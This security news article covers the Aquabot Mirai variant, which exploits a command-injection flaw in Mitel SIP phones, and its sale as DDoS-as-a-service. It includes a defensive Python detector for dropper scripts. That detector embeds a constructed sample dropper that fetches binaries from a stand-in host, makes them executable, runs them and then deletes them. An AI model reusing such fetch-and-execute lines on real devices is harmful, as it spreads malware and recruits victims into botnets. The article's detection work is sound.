Mirai Botnet Variant ‘Aquabot’ Targets Mitel Devices, Offers DDoS-as-a-Service
January 29, 2025
The latest variant of the notorious Mirai botnet, known as Aquabot, is actively exploiting CVE-2024-41710, a known command-injection vulnerability in Mitel SIP phones. The variant is also being advertised on Telegram for use by other attackers, signalling a shift towards a DDoS-as-a-service model. The Akamai Security Intelligence and Response Team (SIRT), which identified the new variant, notes one behaviour it has not seen in other Mirai-based botnets: the bot reports back to its command-and-control (C2) server when it catches a kill signal.
CVE-2024-41710 is a command-injection flaw affecting several Mitel SIP phone models used in corporate environments. Exploitation requires authenticated administrative access to the phone's web interface, which is one reason default credentials on these devices matter; because the phone runs the injected commands as root, a successful exploit gives the attacker root on the device. Aquabot itself is on its third iteration: Akamai first observed it in November 2023, and subsequent versions added concealment and persistence mechanisms intended to keep the bot running by preventing the device from being shut down or restarted.
The latest version, Aquabotv3, introduces a function named 'report_kill', which contacts the C2 whenever the bot catches a kill signal on the infected device. Researchers have not yet observed any response from the C2 to these reports, so the purpose of the feature remains unclear. The other notable aspect of Aquabotv3 is its promotion as a DDoS-as-a-service offering on platforms such as Telegram, where the bot is advertised under several names and sold for both Layer 4 (transport-level) and Layer 7 (application-level) DDoS attacks.
Akamai SIRT observed exploit attempts against CVE-2024-41710 in early January 2025. The payload was almost identical to a proof of concept (PoC) published on GitHub in mid-August 2024 by Packetlabs researcher Kyle Burns, who found that the Mitel 6869i SIP phone running firmware version 6.3.0.1020 failed to sanitize user-supplied input properly.
The payload in the attempts observed by Akamai SIRT fetches and executes a shell script, which in turn downloads and runs the Mirai binary for the victim's CPU; the malware is distributed in builds for a range of architectures, including x86 and ARM. The domain named in the Telegram advertisements, which present the service as a DDoS "testing" tool, is the same domain actively serving the Mirai binaries.
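As an added illustration, not code from the Akamai report or from any tool it names, the following Python triage helper flags the kind of multi-architecture dropper script described above: a fetch-chmod-execute loop over one binary per CPU type, staged in a writable directory and cleaned up afterwards. The sample dropper, the host 198.51.100.10 and the benign comparison script are constructed for this example; the architecture suffixes are those commonly seen on Mirai-family binaries.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Binary suffixes commonly used by Mirai-family droppers: one build per CPU
# type so the same one-liner script works on whatever device it lands on.
ARCH_SUFFIXES = ("x86", "x86_64", "arm", "arm5", "arm6", "arm7",
                 "mips", "mpsl", "ppc", "sh4", "m68k", "spc")

URL_RE = re.compile(r"https?://[^\s;&|'\"]+")
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
STAGE_DIR_RE = re.compile(r"\bcd\s+/(tmp|var/run|dev/shm|mnt)\b|/tmp/")
CHMOD_EXEC_RE = re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")
CLEANUP_RE = re.compile(r"\brm\s+-rf?\s+\S*(\*|\$0)")


@dataclass
class DropperReport:
    urls: list[str] = field(default_factory=list)
    architectures: set[str] = field(default_factory=set)
    stages_in_writable_dir: bool = False
    marks_executable: bool = False
    cleans_up: bool = False

    @property
    def distribution_hosts(self) -> set[str]:
        """Hosts serving the payloads; these are the blocklist candidates."""
        return {urlparse(u).hostname for u in self.urls if urlparse(u).hostname}


def analyze_dropper(script: str) -> DropperReport:
    """Extract dropper indicators from the text of a captured shell script."""
    report = DropperReport()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if FETCH_RE.search(line):
            report.urls.extend(URL_RE.findall(line))
        if STAGE_DIR_RE.search(line):
            report.stages_in_writable_dir = True
        if CHMOD_EXEC_RE.search(line):
            report.marks_executable = True
        if CLEANUP_RE.search(line):
            report.cleans_up = True
    # Infer target CPU types from the downloaded file names.
    for url in report.urls:
        filename = url.rsplit("/", 1)[-1]
        for suffix in ARCH_SUFFIXES:
            if filename.endswith("." + suffix):
                report.architectures.add(suffix)
    return report


def is_mirai_like(report: DropperReport) -> bool:
    """A script that pulls binaries for several CPU types into a writable
    directory and marks them executable is a multi-arch IoT dropper."""
    return (len(report.architectures) >= 3
            and report.stages_in_writable_dir
            and report.marks_executable)


# Constructed sample in the style of a Mirai-family dropper (not a real one).
SAMPLE_DROPPER = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.10/bins/mirai.x86; chmod +x mirai.x86; ./mirai.x86 mitel
wget http://198.51.100.10/bins/mirai.arm; chmod +x mirai.arm; ./mirai.arm mitel
wget http://198.51.100.10/bins/mirai.arm7; chmod +x mirai.arm7; ./mirai.arm7 mitel
wget http://198.51.100.10/bins/mirai.mips; chmod +x mirai.mips; ./mirai.mips mitel
wget http://198.51.100.10/bins/mirai.mpsl; chmod +x mirai.mpsl; ./mirai.mpsl mitel
rm -rf mirai.*
"""

# Constructed benign script: one download into /tmp, no chmod, no arch fan-out.
BENIGN_SCRIPT = """\
#!/bin/sh
wget https://example.com/agent.tar.gz -O /tmp/agent.tar.gz
tar xzf /tmp/agent.tar.gz -C /opt
"""

if __name__ == "__main__":
    for name, text in (("dropper", SAMPLE_DROPPER), ("benign", BENIGN_SCRIPT)):
        r = analyze_dropper(text)
        print(name, sorted(r.architectures), sorted(r.distribution_hosts),
              "mirai-like" if is_mirai_like(r) else "not flagged")
```

The verdict deliberately keys on the architecture fan-out rather than on any single URL or file name, since those change between campaigns while the one-binary-per-CPU pattern does not; the extracted hosts are what you would feed into DNS or egress blocking.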
Most botnets responsible for DDoS attacks are Mirai-based and predominantly target Internet of Things (IoT) devices, whose weak default configurations make the malware relatively easy to spread. A recent wave of global DDoS attacks was attributed to Mirai spinoffs, demonstrating that attackers leveraging Mirai show no sign of slowing down.
Given the high return on investment Mirai offers aspiring botnet authors and the lack of proper security controls on many IoT devices, these devices remain easy targets for Mirai and its variants. The researchers recommend that organizations inventory the IoT devices on their networks, change default credentials and, for this campaign, apply Mitel's fix to affected phones. Akamai SIRT has also published indicators of compromise (IoCs) together with Snort and YARA rules to aid defenders.